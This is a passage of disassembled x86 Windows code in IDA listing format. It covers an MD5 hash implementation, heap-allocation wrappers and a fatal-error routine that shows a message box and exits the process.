mov esi, [ebp+var_4]
lea eax, [esi+3Fh]
cmp eax, [ebp+arg_4]
jnb short loc_41AF24
mov edi, eax
loc_41AF0A: ; CODE XREF: sub_41AE94+8E�j
mov eax, [ebp+arg_0]
mov ecx, ebx
lea eax, [eax+edi-3Fh]
push eax
call sub_41B0C8
add edi, 40h
add esi, 40h
cmp edi, [ebp+arg_4]
jb short loc_41AF0A
loc_41AF24: ; CODE XREF: sub_41AE94+72�j
mov ecx, [ebp+arg_4]
xor eax, eax
jmp short loc_41AF2D
; ---------------------------------------------------------------------------
loc_41AF2B: ; CODE XREF: sub_41AE94+45�j
xor esi, esi
loc_41AF2D: ; CODE XREF: sub_41AE94+95�j
mov edx, [ebp+arg_0]
sub ecx, esi
lea edi, [eax+ebx+18h]
mov eax, ecx
add esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
loc_41AF48: ; CODE XREF: sub_41AE94+B�j
pop ebx
leave
retn 8
sub_41AE94 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
mov esi, ecx
xor ebx, ebx
push edi
mov [ebp-4], esi
cmp [esi+68h], bl
mov byte ptr [ebp-4Ch], 80h
mov [ebp-4Bh], bl
mov [ebp-4Ah], bl
mov [ebp-49h], bl
mov [ebp-48h], bl
mov [ebp-47h], bl
mov [ebp-46h], bl
mov [ebp-45h], bl
mov [ebp-44h], bl
mov [ebp-43h], bl
mov [ebp-42h], bl
mov [ebp-41h], bl
mov [ebp-40h], bl
mov [ebp-3Fh], bl
mov [ebp-3Eh], bl
mov [ebp-3Dh], bl
mov [ebp-3Ch], bl
mov [ebp-3Bh], bl
mov [ebp-3Ah], bl
mov [ebp-39h], bl
mov [ebp-38h], bl
mov [ebp-37h], bl
mov [ebp-36h], bl
mov [ebp-35h], bl
mov [ebp-34h], bl
mov [ebp-33h], bl
mov [ebp-32h], bl
mov [ebp-31h], bl
mov [ebp-30h], bl
mov [ebp-2Fh], bl
mov [ebp-2Eh], bl
mov [ebp-2Dh], bl
mov [ebp-2Ch], bl
mov [ebp-2Bh], bl
mov [ebp-2Ah], bl
mov [ebp-29h], bl
mov [ebp-28h], bl
mov [ebp-27h], bl
mov [ebp-26h], bl
mov [ebp-25h], bl
mov [ebp-24h], bl
mov [ebp-23h], bl
mov [ebp-22h], bl
mov [ebp-21h], bl
mov [ebp-20h], bl
mov [ebp-1Fh], bl
mov [ebp-1Eh], bl
mov [ebp-1Dh], bl
mov [ebp-1Ch], bl
mov [ebp-1Bh], bl
mov [ebp-1Ah], bl
mov [ebp-19h], bl
mov [ebp-18h], bl
mov [ebp-17h], bl
mov [ebp-16h], bl
mov [ebp-15h], bl
mov [ebp-14h], bl
mov [ebp-13h], bl
mov [ebp-12h], bl
mov [ebp-11h], bl
mov [ebp-10h], bl
mov [ebp-0Fh], bl
mov [ebp-0Eh], bl
mov [ebp-0Dh], bl
jz short loc_41B033
mov edi, [ebp+8]
cmp edi, ebx
jz short loc_41B09A
add esi, 58h
movsd
movsd
movsd
movsd
jmp short loc_41B09A
; ---------------------------------------------------------------------------
loc_41B033: ; CODE XREF: _3:0041B021�j
lea edi, [esi+10h]
push 8
lea eax, [ebp-0Ch]
push edi
push eax
mov ecx, esi
call sub_41B9A3
mov eax, [edi]
push 38h
shr eax, 3
and eax, 3Fh
pop ecx
cmp eax, ecx
jb short loc_41B056
push 78h
pop ecx
loc_41B056: ; CODE XREF: _3:0041B051�j
sub ecx, eax
lea eax, [ebp-4Ch]
push ecx
push eax
mov ecx, esi
call sub_41AE94
lea eax, [ebp-0Ch]
push 8
push eax
mov ecx, esi
call sub_41AE94
lea edi, [esi+58h]
push 10h
push esi
push edi
mov ecx, esi
call sub_41B9A3
cmp [ebp+8], ebx
jz short loc_41B090
mov esi, edi
mov edi, [ebp+8]
movsd
movsd
movsd
movsd
mov esi, [ebp-4]
loc_41B090: ; CODE XREF: _3:0041B082�j
xor eax, eax
lea edi, [esi+18h]
stosb
mov byte ptr [esi+68h], 1
loc_41B09A: ; CODE XREF: _3:0041B028�j _3:0041B031�j
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_41B0A1 proc near ; CODE XREF: sub_41AE88+3�p
xor eax, eax
mov dword ptr [ecx], 67452301h
mov [ecx+68h], al
mov [ecx+10h], eax
mov [ecx+14h], eax
mov dword ptr [ecx+4], 0EFCDAB89h
mov dword ptr [ecx+8], 98BADCFEh
mov dword ptr [ecx+0Ch], 10325476h
retn
sub_41B0A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0C8 proc near ; CODE XREF: sub_41AE94+64�p
; sub_41AE94+80�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
mov esi, ecx
push edi
push 40h
mov eax, [esi]
push [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov [ebp+var_8], eax
mov eax, [esi+8]
mov [ebp+var_C], eax
mov eax, [esi+0Ch]
mov [ebp+var_10], eax
lea eax, [ebp+var_50]
push eax
call sub_41B9EA
mov edi, [ebp+var_8]
mov ebx, [ebp+var_C]
mov eax, edi
mov ecx, ebx
not eax
and eax, [ebp+var_10]
and ecx, edi
mov edx, edi
or eax, ecx
mov ecx, [ebp+var_4]
add eax, [ebp+var_50]
lea ecx, [ecx+eax-28955B88h]
mov eax, ecx
shr eax, 19h
shl ecx, 7
or eax, ecx
add eax, edi
mov ecx, eax
and edx, eax
not ecx
and ecx, ebx
or ecx, edx
mov edx, [ebp+var_10]
add ecx, [ebp+var_4C]
lea edx, [edx+ecx-173848AAh]
mov ecx, edx
shr ecx, 14h
shl edx, 0Ch
or ecx, edx
add ecx, eax
mov edx, ecx
not edx
and edx, edi
mov edi, ecx
and edi, eax
or edx, edi
add edx, [ebp+var_48]
lea edx, [ebx+edx+242070DBh]
mov ebx, ecx
mov edi, edx
shr edi, 0Fh
shl edx, 11h
or edi, edx
add edi, ecx
mov edx, edi
and ebx, edi
not edx
and edx, eax
mov [ebp+var_C], edi
or edx, ebx
mov ebx, [ebp+var_8]
add edx, [ebp+var_44]
lea ebx, [ebx+edx-3E423112h]
mov edx, ebx
shl edx, 16h
shr ebx, 0Ah
or edx, ebx
add edx, edi
mov ebx, edx
and edi, edx
not ebx
and ebx, ecx
or ebx, edi
add ebx, [ebp+var_40]
lea eax, [eax+ebx-0A83F051h]
mov edi, eax
shr edi, 19h
shl eax, 7
or edi, eax
mov eax, edx
add edi, edx
mov [ebp+var_4], edi
and eax, [ebp+var_4]
not edi
and edi, [ebp+var_C]
or edi, eax
add edi, [ebp+var_3C]
lea ecx, [ecx+edi+4787C62Ah]
mov eax, ecx
shr eax, 14h
shl ecx, 0Ch
or eax, ecx
add eax, [ebp+var_4]
mov ecx, eax
mov edi, eax
and edi, [ebp+var_4]
mov ebx, eax
not ecx
and ecx, edx
or ecx, edi
mov edi, [ebp+var_C]
add ecx, [ebp+var_38]
lea edi, [edi+ecx-57CFB9EDh]
mov ecx, edi
shr ecx, 0Fh
shl edi, 11h
or ecx, edi
add ecx, eax
mov edi, ecx
and ebx, ecx
not edi
and edi, [ebp+var_4]
or edi, ebx
mov ebx, ecx
add edi, [ebp+var_34]
lea edx, [edx+edi-2B96AFFh]
mov edi, edx
shl edi, 16h
shr edx, 0Ah
or edi, edx
add edi, ecx
mov edx, edi
and ebx, edi
not edx
and edx, eax
mov [ebp+var_8], edi
or edx, ebx
mov ebx, [ebp+var_4]
add edx, [ebp+var_30]
lea ebx, [ebx+edx+698098D8h]
mov edx, ebx
shr edx, 19h
shl ebx, 7
or edx, ebx
add edx, edi
mov ebx, edx
and edi, edx
not ebx
and ebx, ecx
or ebx, edi
add ebx, [ebp+var_2C]
lea eax, [eax+ebx-74BB0851h]
mov edi, eax
shr edi, 14h
shl eax, 0Ch
or edi, eax
add edi, edx
mov eax, edi
mov ebx, edi
not eax
and eax, [ebp+var_8]
and ebx, edx
or eax, ebx
add eax, [ebp+var_28]
lea ecx, [ecx+eax-0A44Fh]
mov ebx, ecx
shr ebx, 0Fh
shl ecx, 11h
or ebx, ecx
mov ecx, edi
add ebx, edi
mov eax, ebx
and ecx, ebx
not eax
and eax, edx
mov [ebp+var_C], ebx
or eax, ecx
mov ecx, [ebp+var_8]
add eax, [ebp+var_24]
lea ecx, [ecx+eax-76A32842h]
mov eax, ecx
shl eax, 16h
shr ecx, 0Ah
or eax, ecx
add eax, ebx
mov ecx, eax
and ebx, eax
not ecx
and ecx, edi
or ecx, ebx
add ecx, [ebp+var_20]
lea edx, [edx+ecx+6B901122h]
mov ecx, edx
shr ecx, 19h
shl edx, 7
or ecx, edx
mov edx, eax
add ecx, eax
mov [ebp+var_4], ecx
and edx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or ecx, edx
add ecx, [ebp+var_1C]
lea edi, [edi+ecx-2678E6Dh]
mov ecx, edi
shr ecx, 14h
shl edi, 0Ch
or ecx, edi
add ecx, [ebp+var_4]
mov [ebp+arg_0], ecx
mov edi, ecx
not [ebp+arg_0]
mov edx, [ebp+arg_0]
and edi, [ebp+var_4]
and edx, eax
mov ebx, ecx
or edx, edi
mov edi, [ebp+var_C]
add edx, [ebp+var_18]
lea edi, [edi+edx-5986BC72h]
mov edx, edi
shr edx, 0Fh
shl edi, 11h
or edx, edi
add edx, ecx
mov [ebp+var_10], edx
and ebx, edx
not [ebp+var_10]
mov edi, [ebp+var_10]
and edi, [ebp+var_4]
or edi, ebx
mov ebx, ecx
add edi, [ebp+var_14]
lea eax, [eax+edi+49B40821h]
mov edi, eax
shl edi, 16h
shr eax, 0Ah
or edi, eax
mov eax, [ebp+arg_0]
add edi, edx
and eax, edx
and ebx, edi
or eax, ebx
mov ebx, [ebp+var_4]
add eax, [ebp+var_4C]
lea eax, [ebx+eax-9E1DA9Eh]
mov ebx, eax
shr ebx, 1Bh
shl eax, 5
or ebx, eax
mov eax, [ebp+var_10]
and eax, edi
add ebx, edi
mov [ebp+arg_0], eax
mov eax, edx
and eax, ebx
mov [ebp+var_4], ebx
mov ebx, eax
mov eax, [ebp+arg_0]
or eax, ebx
add eax, [ebp+var_38]
lea ecx, [ecx+eax-3FBF4CC0h]
mov eax, ecx
shr eax, 17h
shl ecx, 9
or eax, ecx
mov ecx, edi
add eax, [ebp+var_4]
not ecx
and ecx, [ebp+var_4]
mov ebx, eax
and ebx, edi
or ecx, ebx
add ecx, [ebp+var_24]
lea edx, [edx+ecx+265E5A51h]
mov ecx, edx
shr ecx, 12h
shl edx, 0Eh
or ecx, edx
mov edx, [ebp+var_4]
add ecx, eax
mov [ebp+var_C], ecx
and ecx, [ebp+var_4]
not edx
and edx, eax
mov ebx, [ebp+var_C]
or edx, ecx
add edx, [ebp+var_50]
lea edi, [edi+edx-16493856h]
mov edx, eax
mov ecx, edi
shl ecx, 14h
shr edi, 0Ch
or ecx, edi
mov edi, eax
add ecx, ebx
not edx
and edx, ebx
and edi, ecx
or edx, edi
mov edi, [ebp+var_4]
add edx, [ebp+var_3C]
lea edx, [edi+edx-29D0EFA3h]
mov edi, edx
shr edi, 1Bh
shl edx, 5
or edi, edx
mov edx, ebx
add edi, ecx
mov [ebp+var_4], edi
mov edi, ebx
and edi, [ebp+var_4]
not edx
and edx, ecx
or edx, edi
add edx, [ebp+var_28]
lea eax, [eax+edx+2441453h]
mov edx, eax
shr edx, 17h
shl eax, 9
or edx, eax
mov eax, ecx
add edx, [ebp+var_4]
not eax
and eax, [ebp+var_4]
mov edi, edx
and edi, ecx
or eax, edi
add eax, [ebp+var_14]
lea edi, [ebx+eax-275E197Fh]
mov eax, edi
shr eax, 12h
shl edi, 0Eh
or eax, edi
mov edi, [ebp+var_4]
add eax, edx
mov ebx, eax
and ebx, [ebp+var_4]
not edi
and edi, edx
or edi, ebx
mov ebx, edx
add edi, [ebp+var_40]
lea ecx, [ecx+edi-182C0438h]
mov edi, ecx
shl edi, 14h
shr ecx, 0Ch
or edi, ecx
mov ecx, edx
add edi, eax
not ecx
and ecx, eax
and ebx, edi
or ecx, ebx
mov ebx, [ebp+var_4]
add ecx, [ebp+var_2C]
mov [ebp+var_8], edi
lea ebx, [ebx+ecx+21E1CDE6h]
mov ecx, ebx
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
mov ebx, eax
not ebx
add ecx, edi
and ebx, edi
mov edi, eax
and edi, ecx
or ebx, edi
add ebx, [ebp+var_18]
lea edx, [edx+ebx-3CC8F82Ah]
mov edi, edx
shr edi, 17h
shl edx, 9
or edi, edx
mov edx, [ebp+var_8]
add edi, ecx
mov ebx, edi
and ebx, [ebp+var_8]
not edx
and edx, ecx
or edx, ebx
add edx, [ebp+var_44]
lea eax, [eax+edx-0B2AF279h]
mov edx, eax
shr edx, 12h
shl eax, 0Eh
or edx, eax
mov eax, ecx
add edx, edi
not eax
mov ebx, edx
and eax, edi
and ebx, ecx
or eax, ebx
mov ebx, [ebp+var_8]
add eax, [ebp+var_30]
lea eax, [ebx+eax+455A14EDh]
mov ebx, eax
shl ebx, 14h
shr eax, 0Ch
or ebx, eax
mov eax, edi
add ebx, edx
mov [ebp+var_8], ebx
not eax
mov ebx, edi
and eax, edx
and ebx, [ebp+var_8]
or eax, ebx
add eax, [ebp+var_1C]
lea ecx, [ecx+eax-561C16FBh]
mov eax, ecx
shr eax, 1Bh
shl ecx, 5
or eax, ecx
mov ecx, edx
add eax, [ebp+var_8]
mov [ebp+var_4], eax
and ecx, [ebp+var_4]
mov eax, edx
mov ebx, [ebp+var_4]
not eax
and eax, [ebp+var_8]
or eax, ecx
mov ecx, [ebp+var_8]
add eax, [ebp+var_48]
not ecx
and ecx, ebx
lea edi, [edi+eax-3105C08h]
mov eax, edi
shr eax, 17h
shl edi, 9
or eax, edi
add eax, ebx
mov edi, eax
and edi, [ebp+var_8]
or ecx, edi
add ecx, [ebp+var_34]
lea edx, [edx+ecx+676F02D9h]
mov ecx, edx
shr ecx, 12h
shl edx, 0Eh
or ecx, edx
mov edx, ebx
add ecx, eax
not edx
mov edi, ecx
and edx, eax
and edi, ebx
or edx, edi
mov edi, [ebp+var_8]
add edx, [ebp+var_20]
lea edi, [edi+edx-72D5B376h]
mov edx, edi
shl edx, 14h
shr edi, 0Ch
or edx, edi
mov edi, eax
add edx, ecx
xor edi, ecx
xor edi, edx
add edi, [ebp+var_3C]
lea ebx, [ebx+edi-5C6BEh]
mov edi, ebx
shr edi, 1Ch
shl ebx, 4
or edi, ebx
mov ebx, ecx
add edi, edx
xor ebx, edx
xor ebx, edi
add ebx, [ebp+var_30]
lea eax, [eax+ebx-788E097Fh]
mov ebx, eax
shr ebx, 15h
shl eax, 0Bh
or ebx, eax
add ebx, edi
mov eax, ebx
xor eax, edx
xor eax, edi
add eax, [ebp+var_24]
lea ecx, [ecx+eax+6D9D6122h]
mov eax, ecx
shr eax, 10h
shl ecx, 10h
or eax, ecx
mov ecx, ebx
add eax, ebx
xor ecx, eax
mov [ebp+var_C], eax
mov eax, ecx
xor eax, edi
add eax, [ebp+var_18]
lea edx, [edx+eax-21AC7F4h]
mov eax, edx
shl eax, 17h
shr edx, 9
or eax, edx
add eax, [ebp+var_C]
xor ecx, eax
add ecx, [ebp+var_4C]
lea edi, [edi+ecx-5B4115BCh]
mov ecx, edi
shr ecx, 1Ch
shl edi, 4
or ecx, edi
mov edi, [ebp+var_C]
mov edx, edi
add ecx, eax
xor edx, eax
xor edx, ecx
add edx, [ebp+var_40]
lea ebx, [ebx+edx+4BDECFA9h]
mov edx, ebx
shr edx, 15h
shl ebx, 0Bh
or edx, ebx
add edx, ecx
mov ebx, edx
mov [ebp+arg_0], edx
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_34]
lea ebx, [edi+ebx-944B4A0h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
add edi, edx
xor [ebp+arg_0], edi
mov ebx, [ebp+arg_0]
xor ebx, ecx
add ebx, [ebp+var_28]
lea ebx, [eax+ebx-41404390h]
mov eax, ebx
shl eax, 17h
shr ebx, 9
or eax, ebx
mov ebx, [ebp+arg_0]
add eax, edi
xor ebx, eax
add ebx, [ebp+var_1C]
lea ebx, [ecx+ebx+289B7EC6h]
mov ecx, ebx
shr ecx, 1Ch
shl ebx, 4
or ecx, ebx
mov ebx, edi
add ecx, eax
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_50]
lea edx, [edx+ebx-155ED806h]
mov ebx, edx
shr ebx, 15h
shl edx, 0Bh
or ebx, edx
add ebx, ecx
mov edx, ebx
xor edx, eax
xor edx, ecx
add edx, [ebp+var_44]
lea edx, [edi+edx-2B10CF7Bh]
mov edi, edx
shr edi, 10h
shl edx, 10h
or edi, edx
mov [ebp+arg_0], ebx
add edi, ebx
xor [ebp+arg_0], edi
mov edx, [ebp+arg_0]
xor edx, ecx
add edx, [ebp+var_38]
lea edx, [eax+edx+4881D05h]
mov eax, edx
shl eax, 17h
shr edx, 9
or eax, edx
mov edx, [ebp+arg_0]
add eax, edi
xor edx, eax
add edx, [ebp+var_2C]
lea edx, [ecx+edx-262B2FC7h]
mov ecx, edx
shr ecx, 1Ch
shl edx, 4
or ecx, edx
mov edx, edi
xor edx, eax
add ecx, eax
xor edx, ecx
add edx, [ebp+var_20]
lea ebx, [ebx+edx-1924661Bh]
mov edx, ebx
shr edx, 15h
shl ebx, 0Bh
or edx, ebx
add edx, ecx
mov ebx, edx
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_14]
lea ebx, [edi+ebx+1FA27CF8h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
mov ebx, edx
add edi, edx
xor ebx, edi
xor ebx, ecx
add ebx, [ebp+var_48]
lea eax, [eax+ebx-3B53A99Bh]
mov ebx, eax
shl ebx, 17h
shr eax, 9
or ebx, eax
mov eax, edx
add ebx, edi
not eax
or eax, ebx
xor eax, edi
add eax, [ebp+var_50]
lea eax, [ecx+eax-0BD6DDBCh]
mov ecx, eax
shr ecx, 1Ah
shl eax, 6
or ecx, eax
mov eax, edi
add ecx, ebx
not eax
or eax, ecx
xor eax, ebx
add eax, [ebp+var_34]
lea eax, [edx+eax+432AFF97h]
mov edx, eax
shr edx, 16h
shl eax, 0Ah
or edx, eax
mov eax, ebx
add edx, ecx
not eax
or eax, edx
xor eax, ecx
add eax, [ebp+var_18]
lea eax, [edi+eax-546BDC59h]
mov edi, eax
shr edi, 11h
shl eax, 0Fh
or edi, eax
mov eax, ecx
add edi, edx
push 85845DD1h
not eax
or eax, edi
push 15h
xor eax, edx
push [ebp+var_4C]
add eax, [ebp+var_3C]
lea ebx, [ebx+eax-36C5FC7h]
mov eax, ebx
shl eax, 15h
shr ebx, 0Bh
or eax, ebx
mov ebx, edx
add eax, edi
not ebx
or ebx, eax
mov [ebp+var_8], eax
xor ebx, edi
add ebx, [ebp+var_20]
lea ecx, [ecx+ebx+655B59C3h]
mov ebx, ecx
shr ebx, 1Ah
shl ecx, 6
or ebx, ecx
mov ecx, edi
add ebx, eax
not ecx
or ecx, ebx
push ebx
xor ecx, eax
mov [ebp+var_4], ebx
add ecx, [ebp+var_44]
not eax
lea edx, [edx+ecx-70F3336Eh]
mov ecx, edx
shr ecx, 16h
shl edx, 0Ah
or ecx, edx
add ecx, ebx
or eax, ecx
push ecx
xor eax, ebx
mov [ebp+var_10], ecx
add eax, [ebp+var_28]
lea eax, [edi+eax-100B83h]
mov edx, eax
shr edx, 11h
shl eax, 0Fh
or edx, eax
lea eax, [ebp+var_8]
add edx, ecx
push edx
push eax
mov [ebp+var_C], edx
call sub_41B970
push 6FA87E4Fh
push 6
push [ebp+var_30]
lea eax, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_41B970
push 0FE2CE6E0h
push 0Ah
push [ebp+var_14]
lea eax, [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_41B970
add esp, 54h
push 0A3014314h
push 0Fh
push [ebp+var_38]
lea eax, [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push eax
call sub_41B970
push 4E0811A1h
push 15h
push [ebp+var_1C]
lea eax, [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push eax
call sub_41B970
push 0F7537E82h
push 6
push [ebp+var_40]
lea eax, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_41B970
add esp, 54h
lea eax, [ebp+var_10]
push 0BD3AF235h
push 0Ah
push [ebp+var_24]
push [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_41B970
push 2AD7D2BBh
push 0Fh
push [ebp+var_48]
lea eax, [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push eax
call sub_41B970
push 0EB86D391h
push 15h
push [ebp+var_2C]
lea eax, [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push eax
call sub_41B970
mov eax, [ebp+var_4]
add esp, 54h
add [esi], eax
mov eax, [ebp+var_8]
add [esi+4], eax
mov eax, [ebp+var_C]
add [esi+8], eax
mov eax, [ebp+var_10]
add [esi+0Ch], eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_41B0C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B970 proc near ; CODE XREF: sub_41B0C8+79C�p
; sub_41B0C8+7B8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
mov edx, [ebp+arg_0]
not eax
or eax, [ebp+arg_4]
push esi
push 20h
xor eax, [ebp+arg_8]
pop ecx
sub ecx, [ebp+arg_14]
add eax, [edx]
add eax, [ebp+arg_10]
add eax, [ebp+arg_18]
mov esi, eax
shr esi, cl
mov ecx, [ebp+arg_14]
shl eax, cl
or esi, eax
add esi, [ebp+arg_4]
mov [edx], esi
pop esi
pop ebp
retn
sub_41B970 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B9A3 proc near ; CODE XREF: _3:0041B03F�p _3:0041B07A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jbe short loc_41B9E6
mov edx, [ebp+arg_0]
mov ecx, [ebp+arg_4]
push esi
or esi, 0FFFFFFFFh
lea eax, [edx+1]
sub esi, edx
loc_41B9BB: ; CODE XREF: sub_41B9A3+40�j
mov dl, [ecx]
mov [eax-1], dl
mov edx, [ecx]
shr edx, 8
mov [eax], dl
mov edx, [ecx]
shr edx, 10h
mov [eax+1], dl
mov edx, [ecx]
shr edx, 18h
mov [eax+2], dl
add eax, 4
add ecx, 4
lea edx, [esi+eax]
cmp edx, [ebp+arg_8]
jb short loc_41B9BB
pop esi
loc_41B9E6: ; CODE XREF: sub_41B9A3+7�j
pop ebp
retn 0Ch
sub_41B9A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B9EA proc near ; CODE XREF: sub_41B0C8+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jbe short loc_41BA2E
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push esi
push edi
push 0FFFFFFFEh
lea eax, [edx+2]
pop esi
sub esi, edx
loc_41BA03: ; CODE XREF: sub_41B9EA+40�j
movzx edi, byte ptr [eax-1]
xor edx, edx
mov dh, [eax+1]
mov dl, [eax]
add eax, 4
shl edx, 8
or edx, edi
movzx edi, byte ptr [eax-6]
shl edx, 8
or edx, edi
mov [ecx], edx
lea edx, [esi+eax]
add ecx, 4
cmp edx, [ebp+arg_8]
jb short loc_41BA03
pop edi
pop esi
loc_41BA2E: ; CODE XREF: sub_41B9EA+7�j
pop ebp
retn 0Ch
sub_41B9EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA32 proc near ; CODE XREF: _3:00412C91�p _3:00412CB2�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push 0
push 0
push [ebp+var_4]
call ds:dword_4246F8 ; RaiseException
leave
retn
sub_41BA32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA4A proc near ; CODE XREF: sub_411310+3BA�p
; _3:00412E90�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
call sub_41BA87
mov [ebp+var_8], eax
cmp [ebp+arg_0], 0
jnz short loc_41BA61
xor eax, eax
jmp short locret_41BA85
; ---------------------------------------------------------------------------
loc_41BA61: ; CODE XREF: sub_41BA4A+11�j
push [ebp+arg_0]
push 8
push [ebp+var_8]
call ds:dword_4246C0 ; RtlAllocateHeap
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41BA82
mov ecx, 0EF000009h
call sub_41BA32
loc_41BA82: ; CODE XREF: sub_41BA4A+2C�j
mov eax, [ebp+var_4]
locret_41BA85: ; CODE XREF: sub_41BA4A+15�j
leave
retn
sub_41BA4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA87 proc near ; CODE XREF: sub_41BA4A+5�p
; sub_41BACD:loc_41BAD9�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4249A4, 0
jnz short loc_41BAB0
push 0
push 10000h
push 0
call ds:dword_4246C8 ; HeapCreate
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_4249A4, eax
jmp short loc_41BAB8
; ---------------------------------------------------------------------------
loc_41BAB0: ; CODE XREF: sub_41BA87+B�j
mov eax, ds:dword_4249A4
mov [ebp+var_4], eax
loc_41BAB8: ; CODE XREF: sub_41BA87+27�j
cmp [ebp+var_4], 0
jnz short loc_41BAC8
mov ecx, 0EF00000Dh
call sub_41BA32
loc_41BAC8: ; CODE XREF: sub_41BA87+35�j
mov eax, [ebp+var_4]
leave
retn
sub_41BA87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BACD proc near ; CODE XREF: _3:0041221E�p
; sub_41302C+10�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_41BAD9
jmp short locret_41BAEF
; ---------------------------------------------------------------------------
loc_41BAD9: ; CODE XREF: sub_41BACD+8�j
call sub_41BA87
mov [ebp+var_4], eax
push [ebp+arg_0]
push 0
push [ebp+var_4]
call ds:dword_4246C4 ; RtlFreeHeap
locret_41BAEF: ; CODE XREF: sub_41BACD+A�j
leave
retn
sub_41BACD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BAF1 proc near ; CODE XREF: sub_41BB7C+64�p
; sub_41BBE7+3A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push 0
call ds:dword_424744 ; ChangeDisplaySettingsA
push 10h
push ds:off_4214EC
push [ebp+var_4]
push 0
call ds:dword_424750 ; MessageBoxA
push 0
call ds:dword_424664 ; GetCurrentProcess
push eax
call ds:dword_424718 ; TerminateProcess
leave
retn
sub_41BAF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB26 proc near ; CODE XREF: sub_41BB7C+52�p
; sub_41BB7C+5C�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4214F8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_1C], ecx
and [ebp+var_4], 0
push [ebp+var_1C]
call sub_41BC28
pop ecx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41BB6D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_41BB6D: ; CODE XREF: sub_41BB26+3A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41BB26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB7C proc near ; CODE XREF: sub_413056+C4�p
; sub_41396C+CD�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push offset dword_424988
call ds:dword_424644 ; RtlEnterCriticalSection
